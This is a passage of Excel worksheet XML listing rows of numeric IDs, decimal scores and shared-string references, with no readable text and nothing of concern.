        <v>5442</v>
      </c>
      <c r="B5444">
        <v>6558</v>
      </c>
      <c r="C5444">
        <v>6558</v>
      </c>
      <c r="D5444">
        <v>3</v>
      </c>
      <c r="E5444">
        <v>0.98290002346038818</v>
      </c>
      <c r="F5444" t="s">
        <v>10120</v>
      </c>
      <c r="G5444" t="s">
        <v>10765</v>
      </c>
      <c r="H5444" t="s">
        <v>10766</v>
      </c>
    </row>
    <row r="5445" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5445" s="1">
        <v>5443</v>
      </c>
      <c r="B5445">
        <v>6561</v>
      </c>
      <c r="C5445">
        <v>6561</v>
      </c>
      <c r="D5445">
        <v>3</v>
      </c>
      <c r="E5445">
        <v>0.51459997892379761</v>
      </c>
      <c r="F5445" t="s">
        <v>10120</v>
      </c>
      <c r="G5445" t="s">
        <v>10767</v>
      </c>
      <c r="H5445" t="s">
        <v>10768</v>
      </c>
    </row>
    <row r="5446" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5446" s="1">
        <v>5444</v>
      </c>
      <c r="B5446">
        <v>6868</v>
      </c>
      <c r="C5446">
        <v>6868</v>
      </c>
      <c r="D5446">
        <v>3</v>
      </c>
      <c r="E5446">
        <v>0.53009998798370361</v>
      </c>
      <c r="F5446" t="s">
        <v>10120</v>
      </c>
      <c r="G5446" t="s">
        <v>10769</v>
      </c>
      <c r="H5446" t="s">
        <v>10770</v>
      </c>
    </row>
    <row r="5447" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5447" s="1">
        <v>5445</v>
      </c>
      <c r="B5447">
        <v>5923</v>
      </c>
      <c r="C5447">
        <v>5923</v>
      </c>
      <c r="D5447">
        <v>3</v>
      </c>
      <c r="E5447">
        <v>0.69050002098083496</v>
      </c>
      <c r="F5447" t="s">
        <v>10120</v>
      </c>
      <c r="G5447" t="s">
        <v>10771</v>
      </c>
      <c r="H5447" t="s">
        <v>10772</v>
      </c>
    </row>
    <row r="5448" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5448" s="1">
        <v>5446</v>
      </c>
      <c r="B5448">
        <v>7644</v>
      </c>
      <c r="C5448">
        <v>7644</v>
      </c>
      <c r="D5448">
        <v>3</v>
      </c>
      <c r="E5448">
        <v>0.49360001087188721</v>
      </c>
      <c r="F5448" t="s">
        <v>10120</v>
      </c>
      <c r="G5448" t="s">
        <v>10773</v>
      </c>
      <c r="H5448" t="s">
        <v>10774</v>
      </c>
    </row>
    <row r="5449" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5449" s="1">
        <v>5447</v>
      </c>
      <c r="B5449">
        <v>7181</v>
      </c>
      <c r="C5449">
        <v>7181</v>
      </c>
      <c r="D5449">
        <v>3</v>
      </c>
      <c r="E5449">
        <v>0.87199997901916504</v>
      </c>
      <c r="F5449" t="s">
        <v>10120</v>
      </c>
      <c r="G5449" t="s">
        <v>10775</v>
      </c>
      <c r="H5449" t="s">
        <v>10776</v>
      </c>
    </row>
    <row r="5450" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5450" s="1">
        <v>5448</v>
      </c>
      <c r="B5450">
        <v>7642</v>
      </c>
      <c r="C5450">
        <v>7642</v>
      </c>
      <c r="D5450">
        <v>3</v>
      </c>
      <c r="E5450">
        <v>0.6721000075340271</v>
      </c>
      <c r="F5450" t="s">
        <v>10120</v>
      </c>
      <c r="G5450" t="s">
        <v>10777</v>
      </c>
      <c r="H5450" t="s">
        <v>10778</v>
      </c>
    </row>
    <row r="5451" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5451" s="1">
        <v>5449</v>
      </c>
      <c r="B5451">
        <v>7189</v>
      </c>
      <c r="C5451">
        <v>7189</v>
      </c>
      <c r="D5451">
        <v>3</v>
      </c>
      <c r="E5451">
        <v>0.57039999961853027</v>
      </c>
      <c r="F5451" t="s">
        <v>10120</v>
      </c>
      <c r="G5451" t="s">
        <v>10779</v>
      </c>
      <c r="H5451" t="s">
        <v>10780</v>
      </c>
    </row>
    <row r="5452" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5452" s="1">
        <v>5450</v>
      </c>
      <c r="B5452">
        <v>6568</v>
      </c>
      <c r="C5452">
        <v>6568</v>
      </c>
      <c r="D5452">
        <v>3</v>
      </c>
      <c r="E5452">
        <v>0.69419997930526733</v>
      </c>
      <c r="F5452" t="s">
        <v>10120</v>
      </c>
      <c r="G5452" t="s">
        <v>10781</v>
      </c>
      <c r="H5452" t="s">
        <v>10782</v>
      </c>
    </row>
    <row r="5453" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5453" s="1">
        <v>5451</v>
      </c>
      <c r="B5453">
        <v>6859</v>
      </c>
      <c r="C5453">
        <v>6859</v>
      </c>
      <c r="D5453">
        <v>3</v>
      </c>
      <c r="E5453">
        <v>0.99550002813339233</v>
      </c>
      <c r="F5453" t="s">
        <v>10120</v>
      </c>
      <c r="G5453" t="s">
        <v>10783</v>
      </c>
      <c r="H5453" t="s">
        <v>10784</v>
      </c>
    </row>
    <row r="5454" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5454" s="1">
        <v>5452</v>
      </c>
      <c r="B5454">
        <v>7192</v>
      </c>
      <c r="C5454">
        <v>7192</v>
      </c>
      <c r="D5454">
        <v>3</v>
      </c>
      <c r="E5454">
        <v>0.64889997243881226</v>
      </c>
      <c r="F5454" t="s">
        <v>10120</v>
      </c>
      <c r="G5454" t="s">
        <v>10785</v>
      </c>
      <c r="H5454" t="s">
        <v>10786</v>
      </c>
    </row>
    <row r="5455" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5455" s="1">
        <v>5453</v>
      </c>
      <c r="B5455">
        <v>7631</v>
      </c>
      <c r="C5455">
        <v>7631</v>
      </c>
      <c r="D5455">
        <v>3</v>
      </c>
      <c r="E5455">
        <v>0.48870000243186951</v>
      </c>
      <c r="F5455" t="s">
        <v>10120</v>
      </c>
      <c r="G5455" t="s">
        <v>10787</v>
      </c>
      <c r="H5455" t="s">
        <v>10788</v>
      </c>
    </row>
    <row r="5456" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5456" s="1">
        <v>5454</v>
      </c>
      <c r="B5456">
        <v>5727</v>
      </c>
      <c r="C5456">
        <v>5727</v>
      </c>
      <c r="D5456">
        <v>3</v>
      </c>
      <c r="E5456">
        <v>0.80140000581741333</v>
      </c>
      <c r="F5456" t="s">
        <v>10120</v>
      </c>
      <c r="G5456" t="s">
        <v>10789</v>
      </c>
      <c r="H5456" t="s">
        <v>10790</v>
      </c>
    </row>
    <row r="5457" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5457" s="1">
        <v>5455</v>
      </c>
      <c r="B5457">
        <v>7630</v>
      </c>
      <c r="C5457">
        <v>7630</v>
      </c>
      <c r="D5457">
        <v>3</v>
      </c>
      <c r="E5457">
        <v>0.54110002517700195</v>
      </c>
      <c r="F5457" t="s">
        <v>10120</v>
      </c>
      <c r="G5457" t="s">
        <v>10791</v>
      </c>
      <c r="H5457" t="s">
        <v>10792</v>
      </c>
    </row>
    <row r="5458" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5458" s="1">
        <v>5456</v>
      </c>
      <c r="B5458">
        <v>7177</v>
      </c>
      <c r="C5458">
        <v>7177</v>
      </c>
      <c r="D5458">
        <v>3</v>
      </c>
      <c r="E5458">
        <v>0.94499999284744263</v>
      </c>
      <c r="F5458" t="s">
        <v>10120</v>
      </c>
      <c r="G5458" t="s">
        <v>10793</v>
      </c>
      <c r="H5458" t="s">
        <v>10794</v>
      </c>
    </row>
    <row r="5459" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5459" s="1">
        <v>5457</v>
      </c>
      <c r="B5459">
        <v>5916</v>
      </c>
      <c r="C5459">
        <v>5916</v>
      </c>
      <c r="D5459">
        <v>3</v>
      </c>
      <c r="E5459">
        <v>0.77640002965927124</v>
      </c>
      <c r="F5459" t="s">
        <v>10120</v>
      </c>
      <c r="G5459" t="s">
        <v>10795</v>
      </c>
      <c r="H5459" t="s">
        <v>10796</v>
      </c>
    </row>
    <row r="5460" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5460" s="1">
        <v>5458</v>
      </c>
      <c r="B5460">
        <v>7195</v>
      </c>
      <c r="C5460">
        <v>7195</v>
      </c>
      <c r="D5460">
        <v>3</v>
      </c>
      <c r="E5460">
        <v>0.83980000019073486</v>
      </c>
      <c r="F5460" t="s">
        <v>10120</v>
      </c>
      <c r="G5460" t="s">
        <v>10797</v>
      </c>
      <c r="H5460" t="s">
        <v>10798</v>
      </c>
    </row>
    <row r="5461" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5461" s="1">
        <v>5459</v>
      </c>
      <c r="B5461">
        <v>7198</v>
      </c>
      <c r="C5461">
        <v>7198</v>
      </c>
      <c r="D5461">
        <v>3</v>
      </c>
      <c r="E5461">
        <v>0.9976000189781189</v>
      </c>
      <c r="F5461" t="s">
        <v>10120</v>
      </c>
      <c r="G5461" t="s">
        <v>10799</v>
      </c>
      <c r="H5461" t="s">
        <v>10800</v>
      </c>
    </row>
    <row r="5462" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5462" s="1">
        <v>5460</v>
      </c>
      <c r="B5462">
        <v>7623</v>
      </c>
      <c r="C5462">
        <v>7623</v>
      </c>
      <c r="D5462">
        <v>3</v>
      </c>
      <c r="E5462">
        <v>0.55430001020431519</v>
      </c>
      <c r="F5462" t="s">
        <v>10120</v>
      </c>
      <c r="G5462" t="s">
        <v>10801</v>
      </c>
      <c r="H5462" t="s">
        <v>10802</v>
      </c>
    </row>
    <row r="5463" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5463" s="1">
        <v>5461</v>
      </c>
      <c r="B5463">
        <v>5729</v>
      </c>
      <c r="C5463">
        <v>5729</v>
      </c>
      <c r="D5463">
        <v>3</v>
      </c>
      <c r="E5463">
        <v>0.51749998331069946</v>
      </c>
      <c r="F5463" t="s">
        <v>10120</v>
      </c>
      <c r="G5463" t="s">
        <v>10803</v>
      </c>
      <c r="H5463" t="s">
        <v>10804</v>
      </c>
    </row>
    <row r="5464" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5464" s="1">
        <v>5462</v>
      </c>
      <c r="B5464">
        <v>7199</v>
      </c>
      <c r="C5464">
        <v>7199</v>
      </c>
      <c r="D5464">
        <v>3</v>
      </c>
      <c r="E5464">
        <v>0.92690002918243408</v>
      </c>
      <c r="F5464" t="s">
        <v>10120</v>
      </c>
      <c r="G5464" t="s">
        <v>10805</v>
      </c>
      <c r="H5464" t="s">
        <v>10806</v>
      </c>
    </row>
    <row r="5465" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5465" s="1">
        <v>5463</v>
      </c>
      <c r="B5465">
        <v>7619</v>
      </c>
      <c r="C5465">
        <v>7619</v>
      </c>
      <c r="D5465">
        <v>3</v>
      </c>
      <c r="E5465">
        <v>0.79000002145767212</v>
      </c>
      <c r="F5465" t="s">
        <v>10120</v>
      </c>
      <c r="G5465" t="s">
        <v>10807</v>
      </c>
      <c r="H5465" t="s">
        <v>10808</v>
      </c>
    </row>
    <row r="5466" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5466" s="1">
        <v>5464</v>
      </c>
      <c r="B5466">
        <v>7200</v>
      </c>
      <c r="C5466">
        <v>7200</v>
      </c>
      <c r="D5466">
        <v>3</v>
      </c>
      <c r="E5466">
        <v>0.99029999971389771</v>
      </c>
      <c r="F5466" t="s">
        <v>10120</v>
      </c>
      <c r="G5466" t="s">
        <v>10809</v>
      </c>
      <c r="H5466" t="s">
        <v>10810</v>
      </c>
    </row>
    <row r="5467" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5467" s="1">
        <v>5465</v>
      </c>
      <c r="B5467">
        <v>7612</v>
      </c>
      <c r="C5467">
        <v>7612</v>
      </c>
      <c r="D5467">
        <v>3</v>
      </c>
      <c r="E5467">
        <v>0.70450001955032349</v>
      </c>
      <c r="F5467" t="s">
        <v>10120</v>
      </c>
      <c r="G5467" t="s">
        <v>10811</v>
      </c>
      <c r="H5467" t="s">
        <v>10812</v>
      </c>
    </row>
    <row r="5468" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5468" s="1">
        <v>5466</v>
      </c>
      <c r="B5468">
        <v>7610</v>
      </c>
      <c r="C5468">
        <v>7610</v>
      </c>
      <c r="D5468">
        <v>3</v>
      </c>
      <c r="E5468">
        <v>0.80879998207092285</v>
      </c>
      <c r="F5468" t="s">
        <v>10120</v>
      </c>
      <c r="G5468" t="s">
        <v>10813</v>
      </c>
      <c r="H5468" t="s">
        <v>10814</v>
      </c>
    </row>
    <row r="5469" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5469" s="1">
        <v>5467</v>
      </c>
      <c r="B5469">
        <v>7606</v>
      </c>
      <c r="C5469">
        <v>7606</v>
      </c>
      <c r="D5469">
        <v>3</v>
      </c>
      <c r="E5469">
        <v>0.54689997434616089</v>
      </c>
      <c r="F5469" t="s">
        <v>10120</v>
      </c>
      <c r="G5469" t="s">
        <v>10815</v>
      </c>
      <c r="H5469" t="s">
        <v>10816</v>
      </c>
    </row>
    <row r="5470" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5470" s="1">
        <v>5468</v>
      </c>
      <c r="B5470">
        <v>7201</v>
      </c>
      <c r="C5470">
        <v>7201</v>
      </c>
      <c r="D5470">
        <v>3</v>
      </c>
      <c r="E5470">
        <v>0.77170002460479736</v>
      </c>
      <c r="F5470" t="s">
        <v>10120</v>
      </c>
      <c r="G5470" t="s">
        <v>10817</v>
      </c>
      <c r="H5470" t="s">
        <v>10818</v>
      </c>
    </row>
    <row r="5471" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5471" s="1">
        <v>5469</v>
      </c>
      <c r="B5471">
        <v>7598</v>
      </c>
      <c r="C5471">
        <v>7598</v>
      </c>
      <c r="D5471">
        <v>3</v>
      </c>
      <c r="E5471">
        <v>0.8586999773979187</v>
      </c>
      <c r="F5471" t="s">
        <v>10120</v>
      </c>
      <c r="G5471" t="s">
        <v>10819</v>
      </c>
      <c r="H5471" t="s">
        <v>10820</v>
      </c>
    </row>
    <row r="5472" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5472" s="1">
        <v>5470</v>
      </c>
      <c r="B5472">
        <v>7597</v>
      </c>
      <c r="C5472">
        <v>7597</v>
      </c>
      <c r="D5472">
        <v>3</v>
      </c>
      <c r="E5472">
        <v>0.5404999852180481</v>
      </c>
      <c r="F5472" t="s">
        <v>10120</v>
      </c>
      <c r="G5472" t="s">
        <v>10821</v>
      </c>
      <c r="H5472" t="s">
        <v>10822</v>
      </c>
    </row>
    <row r="5473" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5473" s="1">
        <v>5471</v>
      </c>
      <c r="B5473">
        <v>6857</v>
      </c>
      <c r="C5473">
        <v>6857</v>
      </c>
      <c r="D5473">
        <v>3</v>
      </c>
      <c r="E5473">
        <v>0.83639997243881226</v>
      </c>
      <c r="F5473" t="s">
        <v>10120</v>
      </c>
      <c r="G5473" t="s">
        <v>10823</v>
      </c>
      <c r="H5473" t="s">
        <v>10824</v>
      </c>
    </row>
    <row r="5474" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5474" s="1">
        <v>5472</v>
      </c>
      <c r="B5474">
        <v>7626</v>
      </c>
      <c r="C5474">
        <v>7626</v>
      </c>
      <c r="D5474">
        <v>3</v>
      </c>
      <c r="E5474">
        <v>0.68019998073577881</v>
      </c>
      <c r="F5474" t="s">
        <v>10120</v>
      </c>
      <c r="G5474" t="s">
        <v>10825</v>
      </c>
      <c r="H5474" t="s">
        <v>10826</v>
      </c>
    </row>
    <row r="5475" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5475" s="1">
        <v>5473</v>
      </c>
      <c r="B5475">
        <v>6856</v>
      </c>
      <c r="C5475">
        <v>6856</v>
      </c>
      <c r="D5475">
        <v>3</v>
      </c>
      <c r="E5475">
        <v>0.60790002346038818</v>
      </c>
      <c r="F5475" t="s">
        <v>10120</v>
      </c>
      <c r="G5475" t="s">
        <v>10827</v>
      </c>
      <c r="H5475" t="s">
        <v>10828</v>
      </c>
    </row>
    <row r="5476" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5476" s="1">
        <v>5474</v>
      </c>
      <c r="B5476">
        <v>7652</v>
      </c>
      <c r="C5476">
        <v>7652</v>
      </c>
      <c r="D5476">
        <v>3</v>
      </c>
      <c r="E5476">
        <v>0.92239999771118164</v>
      </c>
      <c r="F5476" t="s">
        <v>10120</v>
      </c>
      <c r="G5476" t="s">
        <v>10829</v>
      </c>
      <c r="H5476" t="s">
        <v>10830</v>
      </c>
    </row>
    <row r="5477" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5477" s="1">
        <v>5475</v>
      </c>
      <c r="B5477">
        <v>6547</v>
      </c>
      <c r="C5477">
        <v>6547</v>
      </c>
      <c r="D5477">
        <v>3</v>
      </c>
      <c r="E5477">
        <v>0.97399997711181641</v>
      </c>
      <c r="F5477" t="s">
        <v>10120</v>
      </c>
      <c r="G5477" t="s">
        <v>10831</v>
      </c>
      <c r="H5477" t="s">
        <v>10832</v>
      </c>
    </row>
    <row r="5478" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5478" s="1">
        <v>5476</v>
      </c>
      <c r="B5478">
        <v>6064</v>
      </c>
      <c r="C5478">
        <v>6064</v>
      </c>
      <c r="D5478">
        <v>3</v>
      </c>
      <c r="E5478">
        <v>0.43790000677108759</v>
      </c>
      <c r="F5478" t="s">
        <v>10120</v>
      </c>
      <c r="G5478" t="s">
        <v>10833</v>
      </c>
      <c r="H5478" t="s">
        <v>10834</v>
      </c>
    </row>
    <row r="5479" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5479" s="1">
        <v>5477</v>
      </c>
      <c r="B5479">
        <v>6065</v>
      </c>
      <c r="C5479">
        <v>6065</v>
      </c>
      <c r="D5479">
        <v>3</v>
      </c>
      <c r="E5479">
        <v>0.49250000715255737</v>
      </c>
      <c r="F5479" t="s">
        <v>10120</v>
      </c>
      <c r="G5479" t="s">
        <v>10835</v>
      </c>
      <c r="H5479" t="s">
        <v>10836</v>
      </c>
    </row>
    <row r="5480" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5480" s="1">
        <v>5478</v>
      </c>
      <c r="B5480">
        <v>7689</v>
      </c>
      <c r="C5480">
        <v>7689</v>
      </c>
      <c r="D5480">
        <v>3</v>
      </c>
      <c r="E5480">
        <v>0.63929998874664307</v>
      </c>
      <c r="F5480" t="s">
        <v>10120</v>
      </c>
      <c r="G5480" t="s">
        <v>10837</v>
      </c>
      <c r="H5480" t="s">
        <v>10838</v>
      </c>
    </row>
    <row r="5481" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5481" s="1">
        <v>5479</v>
      </c>
      <c r="B5481">
        <v>7138</v>
      </c>
      <c r="C5481">
        <v>7138</v>
      </c>
      <c r="D5481">
        <v>3</v>
      </c>
      <c r="E5481">
        <v>0.98470002412796021</v>
      </c>
      <c r="F5481" t="s">
        <v>10120</v>
      </c>
      <c r="G5481" t="s">
        <v>10839</v>
      </c>
      <c r="H5481" t="s">
        <v>10840</v>
      </c>
    </row>
    <row r="5482" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5482" s="1">
        <v>5480</v>
      </c>
      <c r="B5482">
        <v>7687</v>
      </c>
      <c r="C5482">
        <v>7687</v>
      </c>
      <c r="D5482">
        <v>3</v>
      </c>
      <c r="E5482">
        <v>0.63639998435974121</v>
      </c>
      <c r="F5482" t="s">
        <v>10120</v>
      </c>
      <c r="G5482" t="s">
        <v>10841</v>
      </c>
      <c r="H5482" t="s">
        <v>10842</v>
      </c>
    </row>
    <row r="5483" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5483" s="1">
        <v>5481</v>
      </c>
      <c r="B5483">
        <v>6531</v>
      </c>
      <c r="C5483">
        <v>6531</v>
      </c>
      <c r="D5483">
        <v>3</v>
      </c>
      <c r="E5483">
        <v>0.60890001058578491</v>
      </c>
      <c r="F5483" t="s">
        <v>10120</v>
      </c>
      <c r="G5483" t="s">
        <v>10843</v>
      </c>
      <c r="H5483" t="s">
        <v>10844</v>
      </c>
    </row>
    <row r="5484" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5484" s="1">
        <v>5482</v>
      </c>
      <c r="B5484">
        <v>7140</v>
      </c>
      <c r="C5484">
        <v>7140</v>
      </c>
      <c r="D5484">
        <v>3</v>
      </c>
      <c r="E5484">
        <v>0.99629998207092285</v>
      </c>
      <c r="F5484" t="s">
        <v>10120</v>
      </c>
      <c r="G5484" t="s">
        <v>10845</v>
      </c>
      <c r="H5484" t="s">
        <v>10846</v>
      </c>
    </row>
    <row r="5485" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5485" s="1">
        <v>5483</v>
      </c>
      <c r="B5485">
        <v>7141</v>
      </c>
      <c r="C5485">
        <v>7141</v>
      </c>
      <c r="D5485">
        <v>3</v>
      </c>
      <c r="E5485">
        <v>0.99730002880096436</v>
      </c>
      <c r="F5485" t="s">
        <v>10120</v>
      </c>
      <c r="G5485" t="s">
        <v>10847</v>
      </c>
      <c r="H5485" t="s">
        <v>10848</v>
      </c>
    </row>
    <row r="5486" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5486" s="1">
        <v>5484</v>
      </c>
      <c r="B5486">
        <v>7142</v>
      </c>
      <c r="C5486">
        <v>7142</v>
      </c>
      <c r="D5486">
        <v>3</v>
      </c>
      <c r="E5486">
        <v>0.89069998264312744</v>
      </c>
      <c r="F5486" t="s">
        <v>10120</v>
      </c>
      <c r="G5486" t="s">
        <v>10849</v>
      </c>
      <c r="H5486" t="s">
        <v>10850</v>
      </c>
    </row>
    <row r="5487" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5487" s="1">
        <v>5485</v>
      </c>
      <c r="B5487">
        <v>7143</v>
      </c>
      <c r="C5487">
        <v>7143</v>
      </c>
      <c r="D5487">
        <v>3</v>
      </c>
      <c r="E5487">
        <v>0.9562000036239624</v>
      </c>
      <c r="F5487" t="s">
        <v>10120</v>
      </c>
      <c r="G5487" t="s">
        <v>10851</v>
      </c>
      <c r="H5487" t="s">
        <v>10852</v>
      </c>
    </row>
    <row r="5488" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5488" s="1">
        <v>5486</v>
      </c>
      <c r="B5488">
        <v>6277</v>
      </c>
      <c r="C5488">
        <v>6277</v>
      </c>
      <c r="D5488">
        <v>3</v>
      </c>
      <c r="E5488">
        <v>0.57489997148513794</v>
      </c>
      <c r="F5488" t="s">
        <v>10120</v>
      </c>
      <c r="G5488" t="s">
        <v>10853</v>
      </c>
      <c r="H5488" t="s">
        <v>10854</v>
      </c>
    </row>
    <row r="5489" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5489" s="1">
        <v>5487</v>
      </c>
      <c r="B5489">
        <v>7146</v>
      </c>
      <c r="C5489">
        <v>7146</v>
      </c>
      <c r="D5489">
        <v>3</v>
      </c>
      <c r="E5489">
        <v>0.99559998512268066</v>
      </c>
      <c r="F5489" t="s">
        <v>10120</v>
      </c>
      <c r="G5489" t="s">
        <v>10855</v>
      </c>
      <c r="H5489" t="s">
        <v>10856</v>
      </c>
    </row>
    <row r="5490" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5490" s="1">
        <v>5488</v>
      </c>
      <c r="B5490">
        <v>7148</v>
      </c>
      <c r="C5490">
        <v>7148</v>
      </c>
      <c r="D5490">
        <v>3</v>
      </c>
      <c r="E5490">
        <v>0.97860002517700195</v>
      </c>
      <c r="F5490" t="s">
        <v>10120</v>
      </c>
      <c r="G5490" t="s">
        <v>10857</v>
      </c>
      <c r="H5490" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="5491" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5491" s="1">
        <v>5489</v>
      </c>
      <c r="B5491">
        <v>6275</v>
      </c>
      <c r="C5491">
        <v>6275</v>
      </c>
      <c r="D5491">
        <v>3</v>
      </c>
      <c r="E5491">
        <v>0.46009999513626099</v>
      </c>
      <c r="F5491" t="s">
        <v>10120</v>
      </c>
      <c r="G5491" t="s">
        <v>10859</v>
      </c>
      <c r="H5491" t="s">
        <v>10860</v>
      </c>
    </row>
    <row r="5492" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5492" s="1">
        <v>5490</v>
      </c>
      <c r="B5492">
        <v>6552</v>
      </c>
      <c r="C5492">
        <v>6552</v>
      </c>
      <c r="D5492">
        <v>3</v>
      </c>
      <c r="E5492">
        <v>0.81629997491836548</v>
      </c>
      <c r="F5492" t="s">
        <v>10120</v>
      </c>
      <c r="G5492" t="s">
        <v>10861</v>
      </c>
      <c r="H5492" t="s">
        <v>10862</v>
      </c>
    </row>
    <row r="5493" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5493" s="1">
        <v>5491</v>
      </c>
      <c r="B5493">
        <v>7151</v>
      </c>
      <c r="C5493">
        <v>7151</v>
      </c>
      <c r="D5493">
        <v>3</v>
      </c>
      <c r="E5493">
        <v>0.83520001173019409</v>
      </c>
      <c r="F5493" t="s">
        <v>10120</v>
      </c>
      <c r="G5493" t="s">
        <v>10863</v>
      </c>
      <c r="H5493" t="s">
        <v>10864</v>
      </c>
    </row>
    <row r="5494" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5494" s="1">
        <v>5492</v>
      </c>
      <c r="B5494">
        <v>7152</v>
      </c>
      <c r="C5494">
        <v>7152</v>
      </c>
      <c r="D5494">
        <v>3</v>
      </c>
      <c r="E5494">
        <v>0.99940001964569092</v>
      </c>
      <c r="F5494" t="s">
        <v>10120</v>
      </c>
      <c r="G5494" t="s">
        <v>10865</v>
      </c>
      <c r="H5494" t="s">
        <v>10866</v>
      </c>
    </row>
    <row r="5495" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5495" s="1">
        <v>5493</v>
      </c>
      <c r="B5495">
        <v>6070</v>
      </c>
      <c r="C5495">
        <v>6070</v>
      </c>
      <c r="D5495">
        <v>3</v>
      </c>
      <c r="E5495">
        <v>0.45899999141693121</v>
      </c>
      <c r="F5495" t="s">
        <v>10120</v>
      </c>
      <c r="G5495" t="s">
        <v>10867</v>
      </c>
      <c r="H5495" t="s">
        <v>10868</v>
      </c>
    </row>
    <row r="5496" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5496" s="1">
        <v>5494</v>
      </c>
      <c r="B5496">
        <v>6540</v>
      </c>
      <c r="C5496">
        <v>6540</v>
      </c>
      <c r="D5496">
        <v>3</v>
      </c>
      <c r="E5496">
        <v>0.56019997596740723</v>
      </c>
      <c r="F5496" t="s">
        <v>10120</v>
      </c>
      <c r="G5496" t="s">
        <v>10869</v>
      </c>
      <c r="H5496" t="s">
        <v>10870</v>
      </c>
    </row>
    <row r="5497" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5497" s="1">
        <v>5495</v>
      </c>
      <c r="B5497">
        <v>7157</v>
      </c>
      <c r="C5497">
        <v>7157</v>
      </c>
      <c r="D5497">
        <v>3</v>
      </c>
      <c r="E5497">
        <v>0.70370000600814819</v>
      </c>
      <c r="F5497" t="s">
        <v>10120</v>
      </c>
      <c r="G5497" t="s">
        <v>10871</v>
      </c>
      <c r="H5497" t="s">
        <v>10872</v>
      </c>
    </row>
    <row r="5498" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5498" s="1">
        <v>5496</v>
      </c>
      <c r="B5498">
        <v>7671</v>
      </c>
      <c r="C5498">
        <v>7671</v>
      </c>
      <c r="D5498">
        <v>3</v>
      </c>
      <c r="E5498">
        <v>0.60600000619888306</v>
      </c>
      <c r="F5498" t="s">
        <v>10120</v>
      </c>
      <c r="G5498" t="s">
        <v>10873</v>
      </c>
      <c r="H5498" t="s">
        <v>10874</v>
      </c>
    </row>
    <row r="5499" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5499" s="1">
        <v>5497</v>
      </c>
      <c r="B5499">
        <v>7162</v>
      </c>
      <c r="C5499">
        <v>7162</v>
      </c>
      <c r="D5499">
        <v>3</v>
      </c>
      <c r="E5499">
        <v>0.81449997425079346</v>
      </c>
      <c r="F5499" t="s">
        <v>10120</v>
      </c>
      <c r="G5499" t="s">
        <v>10875</v>
      </c>
      <c r="H5499" t="s">
        <v>10876</v>
      </c>
    </row>
    <row r="5500" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5500" s="1">
        <v>5498</v>
      </c>
      <c r="B5500">
        <v>6879</v>
      </c>
      <c r="C5500">
        <v>6879</v>
      </c>
      <c r="D5500">
        <v>3</v>
      </c>
      <c r="E5500">
        <v>0.96350002288818359</v>
      </c>
      <c r="F5500" t="s">
        <v>10120</v>
      </c>
      <c r="G5500" t="s">
        <v>10877</v>
      </c>
      <c r="H5500" t="s">
        <v>10878</v>
      </c>
    </row>
    <row r="5501" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5501" s="1">
        <v>5499</v>
      </c>
      <c r="B5501">
        <v>7666</v>
      </c>
      <c r="C5501">
        <v>7666</v>
      </c>
      <c r="D5501">
        <v>3</v>
      </c>
      <c r="E5501">
        <v>0.69650000333786011</v>
      </c>
      <c r="F5501" t="s">
        <v>10120</v>
      </c>
      <c r="G5501" t="s">
        <v>10879</v>
      </c>
      <c r="H5501" t="s">
        <v>10880</v>
      </c>
    </row>
    <row r="5502" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5502" s="1">
        <v>5500</v>
      </c>
      <c r="B5502">
        <v>7665</v>
      </c>
      <c r="C5502">
        <v>7665</v>
      </c>
      <c r="D5502">
        <v>3</v>
      </c>
